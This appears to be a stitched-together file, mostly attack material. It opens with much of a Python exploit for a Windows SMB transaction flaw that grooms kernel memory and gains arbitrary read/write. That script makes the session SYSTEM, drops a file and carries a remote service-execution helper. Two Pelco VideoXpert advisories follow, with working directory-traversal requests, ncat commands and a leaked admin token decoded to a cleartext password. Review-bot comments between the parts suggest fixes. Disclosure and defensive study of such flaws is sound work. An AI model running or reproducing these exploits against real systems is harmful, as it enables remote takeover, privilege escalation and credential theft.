info['BRIDE_DATA_SIZE'] = info['BRIDE_TRANS_SIZE'] - 4 - info['TRANS_SIZE'] # empty transaction name (4)
return info['FRAG_POOL_SIZE']
def align_transaction_and_leak(conn, tid, fid, info, numFill=4):
trans_param = pack('<HH', fid, 0) # param for NT_RENAME
# fill large pagedpool holes (maybe no need)
for i in range(numFill):
conn.send_nt_trans(5, param=trans_param, totalDataCount=0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0)
mid_ntrename = conn.next_mid()
req1 = conn.create_nt_trans_packet(5, param=trans_param, mid=mid_ntrename, data='A'*0x10d0, maxParameterCount=info['GROOM_DATA_SIZE']-0x10d0)
req2 = conn.create_nt_trans_secondary_packet(mid_ntrename, data='B'*276) # leak more 276 bytes
req3 = conn.create_nt_trans_packet(5, param=trans_param, mid=fid, totalDataCount=info['GROOM_DATA_SIZE']-0x1000, maxParameterCount=0x1000)
reqs = []
for i in range(12):
mid = next_extra_mid()
reqs.append(conn.create_trans_packet('', mid=mid, param=trans_param, totalDataCount=info['BRIDE_DATA_SIZE']-0x200, totalParameterCount=0x200, maxDataCount=0, maxParameterCount=0))
conn.send_raw(req1[:-8])
conn.send_raw(req1[-8:]+req2+req3+''.join(reqs))
# expected transactions alignment ("Frag" pool is not shown)
#
# | 5 * PAGE_SIZE | PAGE_SIZE | 5 * PAGE_SIZE | PAGE_SIZE |
# +-------------------------------+----------------+-------------------------------+----------------+
# | GROOM mid=mid_ntrename | extra_mid1 | GROOM mid=fid | extra_mid2 |
# +-------------------------------+----------------+-------------------------------+----------------+
#
# If transactions are aligned as we expected, BRIDE transaction with mid=extra_mid1 will be leaked.
# From leaked transaction, we get
# - leaked transaction address from InParameter or InData
# - transaction, with mid=extra_mid2, address from LIST_ENTRY.Flink
# With these information, we can verify the transaction aligment from displacement.
leakData = conn.recv_transaction_data(mid_ntrename, 0x10d0+276)
leakData = leakData[0x10d4:] # skip parameters and its own input
#open('leak.dat', 'wb').write(leakData)
if leakData[info['FRAG_TAG_OFFSET']:info['FRAG_TAG_OFFSET']+4] != 'Frag':
print('Not found Frag pool tag in leak data')
return None
# ================================
# verify leak data
# ================================
leakData = leakData[info['FRAG_TAG_OFFSET']-4+info['FRAG_POOL_SIZE']:]
# check pool tag and size value in buffer header
expected_size = pack('<H', info['BRIDE_TRANS_SIZE'])
leakTransOffset = info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE']
if leakData[0x4:0x8] != 'LStr' or leakData[info['POOL_ALIGN']:info['POOL_ALIGN']+2] != expected_size or leakData[leakTransOffset+2:leakTransOffset+4] != expected_size:
print('No transaction struct in leak data')
return None
leakTrans = leakData[leakTransOffset:]
ptrf = info['PTR_FMT']
_, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<'+ptrf*5, leakTrans, 8)
inparam_value = unpack_from('<'+ptrf, leakTrans, info['TRANS_INPARAM_OFFSET'])[0]
leak_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
print('CONNECTION: 0x{:x}'.format(connection_addr))
print('SESSION: 0x{:x}'.format(session_addr))
print('FLINK: 0x{:x}'.format(flink_value))
print('InParam: 0x{:x}'.format(inparam_value))
print('MID: 0x{:x}'.format(leak_mid))
next_page_addr = (inparam_value & 0xfffffffffffff000) + 0x1000
if next_page_addr + info['GROOM_POOL_SIZE'] + info['FRAG_POOL_SIZE'] + info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE'] + info['TRANS_FLINK_OFFSET'] != flink_value:
print('unexpected alignment, diff: 0x{:x}'.format(flink_value - next_page_addr))
return None
# trans1: leak transaction
# trans2: next transaction
return {
'connection': connection_addr,
'session': session_addr,
'next_page_addr': next_page_addr,
'trans1_mid': leak_mid,
'trans1_addr': inparam_value - info['TRANS_SIZE'] - 4,
'trans2_addr': flink_value - info['TRANS_FLINK_OFFSET'],
'special_mid': special_mid,
}
def read_data(conn, info, read_addr, read_size):
fmt = info['PTR_FMT']
# modify trans2.OutParameter to leak next transaction and trans2.OutData to leak real data
# modify trans2.*ParameterCount and trans2.*DataCount to limit data
new_data = pack('<'+fmt*3, info['trans2_addr']+info['TRANS_FLINK_OFFSET'], info['trans2_addr']+0x200, read_addr) # OutParameter, InData, OutData
new_data += pack('<II', 0, 0) # SetupCount, MaxSetupCount
new_data += pack('<III', 8, 8, 8) # ParamterCount, TotalParamterCount, MaxParameterCount
new_data += pack('<III', read_size, read_size, read_size) # DataCount, TotalDataCount, MaxDataCount
new_data += pack('<HH', 0, 5) # Category, Function (NT_RENAME)
conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=new_data, dataDisplacement=info['TRANS_OUTPARAM_OFFSET'])
# create one more transaction before leaking data
# - next transaction can be used for arbitrary read/write after the current trans2 is done
# - next transaction address is from TransactionListEntry.Flink value
conn.send_nt_trans(5, param=pack('<HH', info['fid'], 0), totalDataCount=0x4300-0x20, totalParameterCount=0x1000)
# finish the trans2 to leak
conn.send_nt_trans_secondary(mid=info['trans2_mid'])
read_data = conn.recv_transaction_data(info['trans2_mid'], 8+read_size)
# set new trans2 address
info['trans2_addr'] = unpack_from('<'+fmt, read_data)[0] - info['TRANS_FLINK_OFFSET']
# set trans1.InData to &trans2
conn.send_nt_trans_secondary(mid=info['trans1_mid'], param=pack('<'+fmt, info['trans2_addr']), paramDisplacement=info['TRANS_INDATA_OFFSET'])
wait_for_request_processed(conn)
# modify trans2 mid
conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
wait_for_request_processed(conn)
return read_data[8:] # no need to return parameter
def write_data(conn, info, write_addr, write_data):
# trans2.InData
conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<'+info['PTR_FMT'], write_addr), dataDisplacement=info['TRANS_INDATA_OFFSET'])
wait_for_request_processed(conn)
# write data
conn.send_nt_trans_secondary(mid=info['trans2_mid'], data=write_data)
wait_for_request_processed(conn)
def exploit(target, pipe_name):
conn = MYSMB(target)
# set NODELAY to make exploit much faster
conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
info = {}
conn.login(USERNAME, PASSWORD, maxBufferSize=4356)
server_os = conn.get_server_os()
print('Target OS: '+server_os)
if server_os.startswith("Windows 7 ") or server_os.startswith("Windows Server 2008 R2"):
info.update(WIN7_INFO)
elif server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ") or server_os.startswith("Windows Server 2016 "):
info.update(WIN8_INFO)
else:
print('This exploit does not support this target')
sys.exit()
# ================================
# try align pagedpool and leak info until satisfy
# ================================
leakInfo = None
# max attempt: 10
for i in range(10):
tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
conn.set_default_tid(tid)
# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
fid = conn.nt_create_andx(tid, pipe_name)
if 'FRAG_POOL_SIZE' not in info:
leak_frag_size(conn, tid, fid, info)
reset_extra_mid(conn)
leakInfo = align_transaction_and_leak(conn, tid, fid, info)
if leakInfo is not None:
break
print('leak failed... try again')
conn.close(tid, fid)
conn.disconnect_tree(tid)
if leakInfo is None:
return False
info['fid'] = fid
info.update(leakInfo)
# ================================
# shift trans1.Indata ptr with SmbWriteAndX
# ================================
shift_indata_byte = 0x200
conn.do_write_andx_raw_pipe(fid, 'A'*shift_indata_byte)
# Note: Even the distance between bride transaction is exactly what we want, the groom transaction might be in a wrong place.
# So the below operation is still dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
# maxParameterCount (0x1000), trans name (4), param (4)
indata_value = info['next_page_addr'] + info['TRANS_SIZE'] + 8 + info['SRV_BUFHDR_SIZE'] + 0x1000 + shift_indata_byte
indata_next_trans_displacement = info['trans2_addr'] - indata_value
conn.send_nt_trans_secondary(mid=fid, data='\x00', dataDisplacement=indata_next_trans_displacement + info['TRANS_MID_OFFSET'])
wait_for_request_processed(conn)
# if the overwritten is correct, a modified transaction mid should be special_mid now.
# a new transaction with special_mid should be error.
recvPkt = conn.send_nt_trans(5, mid=special_mid, param=pack('<HH', fid, 0), data='')
if recvPkt.getNTStatus() != 0x10002: # invalid SMB
print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
print('!!! Write to wrong place !!!')
print('the target might be crashed')
sys.exit()
print('success controlling groom transaction')
# NSA exploit set refCnt on leaked transaction to very large number for reading data repeatly
# but this method make the transation never get freed
# I will avoid memory leak
# ================================
# modify trans1 struct to be used for arbitrary read/write
# ================================
print('modify trans1 struct for arbitrary read/write')
fmt = info['PTR_FMT']
# modify trans_special.InData to &trans1
conn.send_nt_trans_secondary(mid=fid, data=pack('<'+fmt, info['trans1_addr']), dataDisplacement=indata_next_trans_displacement + info['TRANS_INDATA_OFFSET'])
wait_for_request_processed(conn)
# modify
# - trans1.InParameter to &trans1. so we can modify trans1 struct with itself
# - trans1.InData to &trans2. so we can modify trans2 easily
conn.send_nt_trans_secondary(mid=info['special_mid'], data=pack('<'+fmt*3, info['trans1_addr'], info['trans1_addr']+0x200, info['trans2_addr']), dataDisplacement=info['TRANS_INPARAM_OFFSET'])
wait_for_request_processed(conn)
# modify trans2.mid
info['trans2_mid'] = conn.next_mid()
conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
# Now, read_data() and write_data() can be used for arbitrary read and write.
# ================================
# Modify this SMB session to be SYSTEM
# ================================
# Note: Windows XP stores only PCtxtHandle and uses ImpersonateSecurityContext() for impersonation, so this
# method does not work on Windows XP. But with arbitrary read/write, code execution is not difficult.
print('make this SMB session to be SYSTEM')
# IsNullSession = 0, IsAdmin = 1
write_data(conn, info, info['session']+info['SESSION_ISNULL_OFFSET'], '\x00\x01')
# read session struct to get SecurityContext address
sessionData = read_data(conn, info, info['session'], 0x100)
secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]
# copy SecurityContext for restoration
secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])
print('overwriting session security context')
# see FAKE_SECCTX detail at top of the file
write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])
# ================================
# do whatever we want as SYSTEM over this SMB connection
# ================================
try:
smb_pwn(conn)
except:
pass
# restore SecurityContext. If the exploit does not use null session, PCtxtHandle will be leaked.
write_data(conn, info, secCtxAddr, secCtxData)
conn.disconnect_tree(tid)
conn.logoff()
conn.get_socket().close()
return True
def smb_pwn(conn):
smbConn = smbconnection.SMBConnection(conn.get_remote_host(), conn.get_remote_host(), existingConnection=conn, manualNegotiate=True)
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)
#service_exec(smbConn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
# based on impacket/examples/serviceinstall.py
def service_exec(smbConn, cmd):
import random
import string
from impacket.dcerpc.v5 import transport, srvs, scmr
service_name = ''.join([random.choice(string.letters) for i in range(4)])
# Setup up a DCE SMBTransport with the connection already in place
rpctransport = transport.SMBTransport(smbConn.getRemoteHost(), smbConn.getRemoteHost(), filename=r'\svcctl', smb_connection=smbConn)
rpcsvc = rpctransport.get_dce_rpc()
rpcsvc.connect()
rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
svnHandle = None
try:
print("Opening SVCManager on %s....." % smbConn.getRemoteHost())
resp = scmr.hROpenSCManagerW(rpcsvc)
svcHandle = resp['lpScHandle']
# First we try to open the service in case it exists. If it does, we remove it.
try:
resp = scmr.hROpenServiceW(rpcsvc, svcHandle, service_name+'\x00')
except Exception, e:
if str(e).find('ERROR_SERVICE_DOES_NOT_EXIST') == -1:
raise e # Unexpected error
else:
# It exists, remove it
scmr.hRDeleteService(rpcsvc, resp['lpServiceHandle'])
scmr.hRCloseServiceHandle(rpcsvc, resp['lpServiceHandle'])
print('Creating service %s.....' % service_name)
resp = scmr.hRCreateServiceW(rpcsvc, svcHandle, service_name + '\x00', service_name + '\x00', lpBinaryPathName=cmd + '\x00')
serviceHandle = resp['lpServiceHandle']
if serviceHandle:
# Start service
try:
print('Starting service %s.....' % service_name)
scmr.hRStartServiceW(rpcsvc, serviceHandle)
# is it really need to stop?
# using command line always makes starting service fail because SetServiceStatus() does not get called
print('Stoping service %s.....' % service_name)
scmr.hRControlService(rpcsvc, serviceHandle, scmr.SERVICE_CONTROL_STOP)
except Exception, e:
print(str(e))
print('Removing service %s.....' % service_name)
scmr.hRDeleteService(rpcsvc, serviceHandle)
scmr.hRCloseServiceHandle(rpcsvc, serviceHandle)
except Exception, e:
print("ServiceExec Error on: %s" % smbConn.getRemoteHost())
print(str(e))
finally:
if svcHandle:
scmr.hRCloseServiceHandle(rpcsvc, svcHandle)
rpcsvc.disconnect()
if len(sys.argv) != 3:
print("{} <ip> <pipe_name>".format(sys.argv[0]))
sys.exit(1)
target = sys.argv[1]
pipe_name = sys.argv[2]
exploit(target, pipe_name)
print('Done')
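Review bot: in `service_exec` the initialiser is spelled `svnHandle = None` but the `finally` block tests `if svcHandle:`, so when `hROpenSCManagerW` raises before `svcHandle = resp['lpScHandle']` runs, the cleanup itself dies with an UnboundLocalError that masks the original error; rename the initialiser to `svcHandle = None`. The same function is Python 2 only (`except Exception, e:` three times and `string.letters`, which is `string.ascii_letters` on Python 3) while the rest of the file uses parenthesised `print(...)`, so state the required interpreter at the top of the file. In `exploit`, the bare `except: pass` around `smb_pwn(conn)` swallows every failure, including KeyboardInterrupt, before `write_data(...)` restores the security context; catch `Exception` and log it so a failed post-exploitation step is visible. `exploit()` returns False when the leak loop gives up, but the top-level call discards the return value and prints 'Done' regardless; check the result and exit non-zero. Style: `read_data` assigns a local named `read_data` inside the function of the same name, and `write_data` takes a parameter named `write_data`, both of which shadow the function they live in; and the comments misspell 'ParameterCount', 'repeatedly', 'transaction', 'Stopping' and 'bridge' ('bride transaction').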


@ -0,0 +1,149 @@
Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: 2.0.41
1.14.7
1.12.105
Summary: VideoXpert is a video management solution designed for
scalability, fitting the needs surveillance operations of any size.
VideoXpert Ultimate can also aggregate other VideoXpert systems,
tying multiple video management systems into a single interface.
Desc: Pelco VideoXpert suffers from a directory traversal vulnerability.
Exploiting this issue will allow an unauthenticated attacker to
view arbitrary files within the context of the web server.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Jetty(9.2.6.v20141205)
MongoDB/3.2.10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5419
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
05.04.2017
--
PoC:
----
GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP/1.1 200 OK
Date: Wed, 05 Apr 2017 13:27:39 GMT
Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
ETag: 1247548162000
Content-Length: 403
Connection: close
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
------
GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 11:59:07 GMT
Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1491397116000
Content-Length: 9
Connection: close
T0ps3cret
------
bash-4.4$ cat pelco_system_ini.txt
GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to 172.19.0.198:80.
HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 12:30:01 GMT
Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1244668084000
Content-Length: 219
Connection: close
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds.
bash-4.4$
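Review bot: the advisory gives no vendor response, fix version or disclosure timeline beyond the single date '05.04.2017', so a reader cannot tell whether the three listed builds (2.0.41, 1.14.7, 1.12.105) are the only affected ones or whether a patched release exists; add a timeline and a fix or workaround section. The defensive fix the PoC points at is canonicalising the requested path before the static-content lookup, rejecting any segment containing '..' or a backslash, and confining the lookup to the portal directory; the `Content-Type: text/html` returned for win.ini and system.ini shows the handler serves whatever the path resolves to. The second request reaches ProgramData\Pelco\Core\db\security\key.pem, which is a materially worse outcome than reading win.ini and belongs in the 'Desc' paragraph rather than being left for the reader to infer from the transcript. Minor: the summary sentence is missing 'of' ('the needs of surveillance operations'), and the first two PoC exchanges do not say how the request was sent, unlike the third, which shows the ncat invocation.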


@ -0,0 +1,81 @@
Schneider Electric Pelco VideoXpert Missing Encryption Of Sensitive Information
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: 2.0.41
1.14.7
1.12.105
Summary: VideoXpert is a video management solution designed for
scalability, fitting the needs surveillance operations of any size.
VideoXpert Ultimate can also aggregate other VideoXpert systems,
tying multiple video management systems into a single interface.
Desc: The software transmits sensitive data using double Base64 encoding
for the Cookie 'auth_token' in a communication channel that can be
sniffed by unauthorized actors or arbitrarely be read from the vxcore
log file directly using directory traversal attack resulting in
authentication bypass / session hijacking.
Ref: ZSL-2017-5419
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Jetty(9.2.6.v20141205)
MongoDB/3.2.10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5420
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5420.php
05.04.2017
--
After a user logs in, the web server creates a Cookie: auth_token which has the following value:
ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5
Base64 decoding that becomes:
eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbjEyMyIsImRvbWFpbiI6IkxPQ0FMIiwiZXhwaXJlcyI6MTQ5MTU1Njc5NzE1OCwiYWdlbnQiOiI0MGY2NDM4Ni1mZmMwLTQ1NDEtOWNjZC1hNTIyM2RiMmZjMDkiLCJjbGllbnRJcCI6IjEyNy4wLjAuMSJ9
Again decoding, gives us result:
{"username":"admin","password":"admin123","domain":"LOCAL","expires":1491556797158,"agent":"40f64386-ffc0-4541-9ccd-a5223db2fc09","clientIp":"127.0.0.1"}
PoC remote session takeover with directory traversal:
-----------------------------------------------------
bash-4.4$ cat pelco_live.txt
GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\core\vxcore.log HTTP/1.1
Host: 127.0.0.1
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
Content-Type: text/plain; charset=utf-8
Accept: */*
Referer: https://127.0.0.1/portal/
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
bash-4.4$ ncat -v -n 127.0.0.1 80 < pelco_live.txt > vxcore_log.txt
bash-4.4$ cat vxcore_log.txt
--snip--
INFO [2017-04-06 11:20:09.999] [HealthCheckMonitorPollingThread-0] org.mongodb.driver.connection: Closed connection [connectionId{localValue:400, serverValue:473}] to mongod0-rs1-dfde27ce-6a4f-413a-a7c2-6df855d462df:31001 because the pool has been closed.
INFO [2017-04-06 11:20:12.559] [dw-5099 - GET /portal/System.html?auth_token=ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/System.html
INFO [2017-04-06 11:20:12.567] [dw-5055 - GET /portal/Lilac.css] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/Lilac.css
INFO [2017-04-06 11:20:12.568] [dw-5098 - GET /portal/lilac/lilac.nocache.js] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/lilac/lilac.nocache.js
--snip--
bash-4.4$ cat pelco_auth_token.txt
ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5
bash-4.4$ base64 -D pelco_auth_token.txt |base64 -D -
{"username":"admin","password":"admin123","domain":"LOCAL","expires":1491556797158,"agent":"40f64386-ffc0-4541-9ccd-a5223db2fc09","clientIp":"127.0.0.1"}
bash-4.4$
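Review bot: the decoded token contains the user's cleartext password ("password":"admin123"), so the problem is broader than the title's 'Missing Encryption': the cookie is a bearer credential that embeds the password, and the logged request line `GET /portal/System.html?auth_token=...` shows the same token being accepted in the URL query string and written to vxcore.log, which is what makes the traversal from ZSL-2017-5419 turn into session theft even on a TLS-only deployment; the 'Desc' paragraph should state both points. The ncat command sends the request to port 80 and receives the log contents, so the portal answers over cleartext HTTP although the Referer points at https://, which supports the sniffing claim and is worth saying explicitly. The heading 'PoC remote session takeover' promises more than the transcript shows: it ends at decoding the token, so the takeover is asserted rather than demonstrated and should be described as such. Suggested remediation for a fix section: issue an opaque random session identifier that carries no credentials, mark the cookie Secure and HttpOnly, refuse auth_token in the query string, redact query strings in request logs, and serve the portal over HTTPS only. Minor: `base64 -D` is the BSD/macOS flag (GNU coreutils uses `-d`), 'arbitrarely' should be 'arbitrarily', and the summary is missing 'of' ('the needs of surveillance operations').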